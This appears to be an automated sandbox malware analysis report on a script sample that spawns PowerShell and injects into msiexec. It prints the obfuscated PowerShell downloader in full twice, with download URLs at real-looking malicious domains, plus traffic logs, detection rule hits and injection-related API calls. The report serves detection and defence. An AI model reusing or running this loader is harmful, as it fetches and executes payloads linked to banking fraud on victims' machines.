              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSpatleTransRfeckfIStripO DiscN .ype1Fee,i9 Anna4Ga
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-18T18:12:35.608401+010028032702Potentially Bad Traffic192.168.2.449480203.170.87.17443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://heavyequipmentsales.au/admin/Verdensalt.asiAvira URL Cloud: Label: phishing
              Source: https://heavyequipmentsales.au/JAvira URL Cloud: Label: phishing
              Source: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binMAvira URL Cloud: Label: phishing
              Source: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.bindAvira URL Cloud: Label: phishing
              Source: https://heavyequipmentsales.auAvira URL Cloud: Label: phishing
              Source: http://heavyequipmentsales.auAvira URL Cloud: Label: phishing
              Source: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binSpissResqp.lqaebo2.ru.com/admin/bmFpLgqmXzoAvira URL Cloud: Label: phishing
              Source: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binsAvira URL Cloud: Label: phishing
              Source: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binAvira URL Cloud: Label: phishing
              Source: https://heavyequipmentsales.au/Avira URL Cloud: Label: phishing
              Source: Yara matchFile source: 00000008.00000002.2098902399.000000001FA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 203.170.87.17:443 -> 192.168.2.4:49473 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 203.170.87.17:443 -> 192.168.2.4:49480 version: TLS 1.2
              Source: Binary string: em.Core.pdbU source: powershell.exe, 00000003.00000002.1995087687.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: jqm.Core.pdb source: powershell.exe, 00000003.00000002.1995087687.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbC source: powershell.exe, 00000003.00000002.2002255520.0000000008845000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdb1226 source: powershell.exe, 00000003.00000002.1995087687.0000000007735000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2002255520.0000000008845000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2024582513.000000001FB2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2021729373.000000001F97D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2024582513.000000001FB2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2021729373.000000001F97D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49480 -> 203.170.87.17:443
              Source: global trafficHTTP traffic detected: GET /admin/Verdensalt.asi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: heavyequipmentsales.auConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /admin/bmFpLgqmXzovv105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: heavyequipmentsales.auCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /admin/Verdensalt.asi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: heavyequipmentsales.auConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /admin/bmFpLgqmXzovv105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: heavyequipmentsales.auCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: heavyequipmentsales.au
              Source: powershell.exe, 00000003.00000002.1995087687.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro2
              Source: wscript.exe, 00000000.00000003.1699405712.000001A1C99B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700250501.000001A1C99D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1701445732.000001A1C99D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700019061.000001A1C99D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000003.1699405712.000001A1C99B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700250501.000001A1C99D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1701445732.000001A1C9A0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700019061.000001A1C99D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700651622.000001A1C9A0B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1688604748.000001A1CB7A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1689254047.000001A1CB7A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1689372081.000001A1CB7A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab(N
              Source: wscript.exe, 00000000.00000003.1689372081.000001A1CB79B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4b2dddda50dd1
              Source: wscript.exe, 00000000.00000003.1699405712.000001A1C99B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700250501.000001A1C99D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1701445732.000001A1C99D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700019061.000001A1C99D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
              Source: wscript.exe, 00000000.00000003.1689172594.000001A1C9A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4b2dddda50
              Source: powershell.exe, 00000001.00000002.1845657485.000001F581D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://heavyequipmentsales.au
              Source: powershell.exe, 00000001.00000002.1872749558.000001F59006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1995087687.0000000007650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1845657485.000001F580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1963659516.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1995087687.0000000007650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1845657485.000001F580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000003.00000002.1963659516.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
              Source: powershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1995087687.0000000007650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1845657485.000001F580BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1845657485.000001F580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845657485.000001F581A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heavyequipmentsales.au
              Source: msiexec.exe, 00000008.00000002.2079306756.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heavyequipmentsales.au/
              Source: msiexec.exe, 00000008.00000002.2079306756.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heavyequipmentsales.au/J
              Source: powershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heavyequipmentsales.au/admin/Verdensalt.asi
              Source: msiexec.exe, 00000008.00000002.2079306756.0000000002AB3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2079306756.0000000002A8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2098530804.000000001F6E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2079306756.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.bin
              Source: msiexec.exe, 00000008.00000002.2079306756.0000000002AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binM
              Source: msiexec.exe, 00000008.00000002.2098530804.000000001F6E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binSpissResqp.lqaebo2.ru.com/admin/bmFpLgqmXzo
              Source: msiexec.exe, 00000008.00000002.2079306756.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.bind
              Source: msiexec.exe, 00000008.00000002.2079306756.0000000002AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.bins
              Source: powershell.exe, 00000001.00000002.1872749558.000001F59006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qp.lqaebo2.ru.com/admin/Verdensalt
              Source: powershell.exe, 00000001.00000002.1845657485.000001F580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845657485.000001F5815D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qp.lqaebo2.ru.com/admin/Verdensalt.asi
              Source: unknownNetwork traffic detected: HTTP traffic on port 49480 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49473
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49480
              Source: unknownNetwork traffic detected: HTTP traffic on port 49473 -> 443
              Source: unknownHTTPS traffic detected: 203.170.87.17:443 -> 192.168.2.4:49473 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 203.170.87.17:443 -> 192.168.2.4:49480 version: TLS 1.2

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000008.00000002.2098902399.000000001FA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: amsi32_3488.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6776, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3488, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial file: Hemitropal=Tordenbraget.ShellExecute(Hjertesygdommens,Sicknessproof(34) & Udkiksposten & Sicknessproof(34),"","",0)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSp
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSpJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_1FD52DF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_1FD52C70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD535C0 NtCreateMutant,LdrInitializeThunk,8_2_1FD535C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52FE0 NtCreateFile,8_2_1FD52FE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52F90 NtProtectVirtualMemory,8_2_1FD52F90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52FB0 NtResumeThread,8_2_1FD52FB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52FA0 NtQuerySection,8_2_1FD52FA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52F60 NtCreateProcessEx,8_2_1FD52F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52F30 NtCreateSection,8_2_1FD52F30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52EE0 NtQueueApcThread,8_2_1FD52EE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52E80 NtReadVirtualMemory,8_2_1FD52E80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52EA0 NtAdjustPrivilegesToken,8_2_1FD52EA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52E30 NtWriteVirtualMemory,8_2_1FD52E30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52DD0 NtDelayExecution,8_2_1FD52DD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52DB0 NtEnumerateKey,8_2_1FD52DB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD53D70 NtOpenThread,8_2_1FD53D70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD53D10 NtOpenProcessToken,8_2_1FD53D10
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52D10 NtMapViewOfSection,8_2_1FD52D10
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52D00 NtSetInformationFile,8_2_1FD52D00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52D30 NtUnmapViewOfSection,8_2_1FD52D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52CC0 NtQueryVirtualMemory,8_2_1FD52CC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52CF0 NtOpenProcess,8_2_1FD52CF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52CA0 NtQueryInformationToken,8_2_1FD52CA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52C60 NtCreateKey,8_2_1FD52C60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52C00 NtQueryInformationProcess,8_2_1FD52C00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52BF0 NtAllocateVirtualMemory,8_2_1FD52BF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52BE0 NtQueryValueKey,8_2_1FD52BE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52B80 NtQueryInformationFile,8_2_1FD52B80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52BA0 NtEnumerateValueKey,8_2_1FD52BA0
